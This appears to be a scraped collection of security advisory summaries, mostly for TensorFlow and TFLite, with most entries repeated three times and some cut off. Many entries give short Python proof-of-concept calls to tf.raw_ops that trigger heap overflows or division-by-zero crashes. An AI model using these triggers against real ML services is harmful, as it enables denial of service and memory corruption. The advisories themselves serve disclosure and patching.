The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)
An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …
An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …
An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …
The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …
The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …
The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt)
The implementation of the Split TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, "Not an even split"); const int slice_size = input_size / num_splits; An attacker can craft a model such that num_splits would be 0.
The implementation of the Split TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, "Not an even split"); const int slice_size = input_size / num_splits; An attacker can craft a model such that num_splits would be 0.
The implementation of the Split TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, "Not an even split"); const int slice_size = input_size / num_splits; An attacker can craft a model such that num_splits would be 0.
The TFLite implementation of hashtable lookup is vulnerable to a division by zero error: const int num_rows = SizeOfDimension(value, 0); const int row_bytes = value->bytes / num_rows; An attacker can craft a model such that values's first dimension would be 0.
The TFLite implementation of hashtable lookup is vulnerable to a division by zero error: const int num_rows = SizeOfDimension(value, 0); const int row_bytes = value->bytes / num_rows; An attacker can craft a model such that values's first dimension would be 0.
The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.
The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.
The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.
The implementation of the SVDF TFLite operator is vulnerable to a division by zero error: const int rank = params->rank; … TF_LITE_ENSURE_EQ(context, num_filters % rank, 0); An attacker can craft a model such that params->rank would be 0.
The implementation of the SVDF TFLite operator is vulnerable to a division by zero error: const int rank = params->rank; … TF_LITE_ENSURE_EQ(context, num_filters % rank, 0); An attacker can craft a model such that params->rank would be 0.
The implementation of the SVDF TFLite operator is vulnerable to a division by zero error: const int rank = params->rank; … TF_LITE_ENSURE_EQ(context, num_filters % rank, 0); An attacker can craft a model such that params->rank would be 0.
The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.
The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.
The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.
The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.
The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.
The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.
The reference implementation of the GatherNd TFLite operator is vulnerable to a division by zero error: ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i); An attacker can craft a model such that params input would be an empty tensor. In turn, params_shape.Dims(.) would be zero, in at least one dimension.
The reference implementation of the GatherNd TFLite operator is vulnerable to a division by zero error: ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i); An attacker can craft a model such that params input would be an empty tensor. In turn, params_shape.Dims(.) would be zero, in at least one dimension.
The reference implementation of the GatherNd TFLite operator is vulnerable to a division by zero error: ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i); An attacker can craft a model such that params input would be an empty tensor. In turn, params_shape.Dims(.) would be zero, in at least one dimension.
The implementation of the EmbeddingLookup TFLite operator is vulnerable to a division by zero error: const int row_size = SizeOfDimension(value, 0); const int row_bytes = value->bytes / row_size; An attacker can craft a model such that the first dimension of the value input is 0.
The implementation of the EmbeddingLookup TFLite operator is vulnerable to a division by zero error: const int row_size = SizeOfDimension(value, 0); const int row_bytes = value->bytes / row_size; An attacker can craft a model such that the first dimension of the value input is 0.
The implementation of the EmbeddingLookup TFLite operator is vulnerable to a division by zero error: const int row_size = SizeOfDimension(value, 0); const int row_bytes = value->bytes / row_size; An attacker can craft a model such that the first dimension of the value input is 0.
The implementation of the DepthwiseConv TFLite operator is vulnerable to a division by zero error: int num_input_channels = SizeOfDimension(input, 3); TF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0); An attacker can craft a model such that input's fourth dimension would be 0.
The implementation of the DepthwiseConv TFLite operator is vulnerable to a division by zero error: int num_input_channels = SizeOfDimension(input, 3); TF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0); An attacker can craft a model such that input's fourth dimension would be 0.
The implementation of the DepthwiseConv TFLite operator is vulnerable to a division by zero error: int num_input_channels = SizeOfDimension(input, 3); TF_LITE_ENSURE_EQ(context, num_filter_channels % num_input_channels, 0); An attacker can craft a model such that input's fourth dimension would be 0.
The implementation of the DepthToSpace TFLite operator is vulnerable to a division by zero error: const int block_size = params->block_size; … const int input_channels = input->dims->data[3]; … int output_channels = input_channels / block_size / block_size; An attacker can craft a model such that params->block_size is 0.
The implementation of the DepthToSpace TFLite operator is vulnerable to a division by zero error: const int block_size = params->block_size; … const int input_channels = input->dims->data[3]; … int output_channels = input_channels / block_size / block_size; An attacker can craft a model such that params->block_size is 0.
The implementation of the DepthToSpace TFLite operator is vulnerable to a division by zero error: const int block_size = params->block_size; … const int input_channels = input->dims->data[3]; … int output_channels = input_channels / block_size / block_size; An attacker can craft a model such that params->block_size is 0.
The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.
TFLite's convolution code has multiple division where the divisor is controlled by the user and not checked to be non-zero. For example: const int input_size = NumElements(input) / SizeOfDimension(input, 0);
TFLite's convolution code has multiple division where the divisor is controlled by the user and not checked to be non-zero. For example: const int input_size = NumElements(input) / SizeOfDimension(input, 0);
TFLite's convolution code has multiple division where the divisor is controlled by the user and not checked to be non-zero. For example: const int input_size = NumElements(input) / SizeOfDimension(input, 0);
The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …
The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …
The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …
Optimized pooling implementations in TFLite fail to check that the stride arguments are not 0 before calling ComputePaddingHeightWidth. Since users can craft special models which will have params->stride_{height,width} be zero, this will result in a division by zero.
Optimized pooling implementations in TFLite fail to check that the stride arguments are not 0 before calling ComputePaddingHeightWidth. Since users can craft special models which will have params->stride_{height,width} be zero, this will result in a division by zero.
Optimized pooling implementations in TFLite fail to check that the stride arguments are not 0 before calling ComputePaddingHeightWidth. Since users can craft special models which will have params->stride_{height,width} be zero, this will result in a division by zero.
A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])
A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])
A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])
An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )
An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )
An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"
An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)
An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)
An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)
